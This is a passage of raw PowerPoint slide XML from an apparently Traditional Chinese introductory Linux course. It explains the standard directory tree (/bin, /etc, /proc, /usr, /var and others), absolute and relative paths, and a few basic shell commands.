              <a:t>touch s1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch s2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> /CUR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759483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目錄樹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7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739161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在安裝 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的磁碟中會有許多系統預設的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這些目錄依照不同的用途而放置特定的檔案。以下將詳細說明每一個預設目錄的功用：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：根目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包含整個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統的所有目錄和檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：此目錄放置操作系統時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所需使用的各種指令程式。例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>rpm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ta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mv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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等常用指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>還有各種不同的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bash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zsh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tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等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71509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/bin/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：已經被 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所取代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ksh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Kornshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>AT&amp;T Bell lab. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發展出來的，相容於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bash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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：整合 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>C Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，提供更多的功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：已經被 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所取代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：基於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發展出來的，功能更強大的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell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092046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/boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：系統啟動時必須讀取的檔案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包括系統核心在內。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：存放周邊設備代號的檔案。例如硬碟的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>hda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、終端機的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/dev/tty0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>等等。這些檔案比較特殊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它們實際上都指向所代表的周邊設備。</a:t>
            </a:r>
          </a:p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zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：放置與系統設定、管理相關的檔案。例如記錄帳號名稱的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd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檔、投影密碼檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>都放在這裡。</a:t>
            </a:r>
          </a:p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etc</a:t>
            </a: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rc.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：這個目錄包含了開機或關機時所執行的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔案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856852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X11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>X Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定檔案的目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：此目錄預設用來放置使用者帳號的家目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：放置一些共用的函式庫。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/lib/modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：存放系統核心的模組。某些可被模組化的部份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並不需要在編譯系統核心時放入核心本體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>避免核心過大導致效率低落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237275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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lost+found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：檔案系統發生問題時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>會自動掃描磁碟試圖修正錯誤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>倘若找到遺失或錯誤的區段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就會將這些區段轉成檔案存放於此目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等候管理人員進一步處理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/media</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：此目錄可用來做為光碟、軟碟片、隨身碟與其他分割區的自動掛載點。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fedora Core 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fedora Core 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>光碟、軟碟片、隨身碟與其他分割區的掛載點是放在 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mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄下。自 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fedora Core 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以後則是在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄下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8844190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mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：此目錄可以做為手動掛載其他分割區的掛載點。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：系統核心和執行程序之間的資訊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比如說執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ps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free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>等指令時所看到的訊息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就是從這裡讀取。這目錄內的檔案並非真的存在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使用者看到的是如同幻影般的虛擬檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：系統管理者專用的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亦即 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>帳號的家目錄。</a:t>
            </a:r>
          </a:p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sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：此目錄存放啟動系統需執行的程式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例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fsck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>grub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>swapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>等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545009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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：供全部使用者暫時放置檔案的目錄。系統預設可讓所有使用者讀取、寫入和執行檔案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所有使用者皆能暫時利用此目錄存放檔案。這裡也是暫存檔的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某些程式在執行中所產生的臨時檔案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會存放在這個目錄內。</a:t>
            </a:r>
          </a:p>
          <a:p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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：此目錄包括許多子目錄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用來存放系統指令、程式等資訊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5288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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：放置使用者可以執行的指令程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>free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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等等。</a:t>
            </a:r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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：此目錄用來存放自行編譯的軟體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以便與使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>RPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安裝的軟體互相區隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>避免兩個套件系統發生衝突的情況。</a:t>
            </a:r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share/doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：存放各種文件的目錄。</a:t>
            </a:r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share/man</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：放置多種線上說明文件。</a:t>
            </a:r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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：存放原始碼的地方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統核心的原始碼就放在這裡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160384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400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>：系統執行時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內容經常變動的資料或暫存檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>都會放置在這個目錄裡。包括使用者的郵件檔案、記載系統活動過程的記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(log) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>檔、列印工作的佇列檔、暫存檔及系統執行程式的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>PID (Process ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>程序識別碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>記錄等等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>網頁目錄與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>目錄等伺服器的專用目錄也位於此處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3504212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現在開始第四章課程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Linux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檔案與目錄管理的部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680924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8995" name="備忘稿版面配置區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latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>檔案讀取讀入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4689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  <a:lvl2pPr marL="745179" indent="-286607"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marL="1146429" indent="-229286"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marL="1605001" indent="-229286"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marL="2063572" indent="-229286"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2522144" indent="-229286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2980715" indent="-229286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3439287" indent="-229286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3897859" indent="-229286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fld id="{32BDD7CA-FF77-4428-B1B8-618F32230ED1}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="Arial" charset="0"/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絕對路徑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由根目錄開始寫起的檔名或目錄名稱，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home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mtsai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.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bashrc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;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="zh-TW" sz="14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相對路徑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相對於目前路徑的寫法，如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/home/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mtsai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8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86904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="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>『作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>業系統』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>電腦系統的總管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，它負責所有計算資源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>分配</a:t>
            </a:r>
            <a:r>
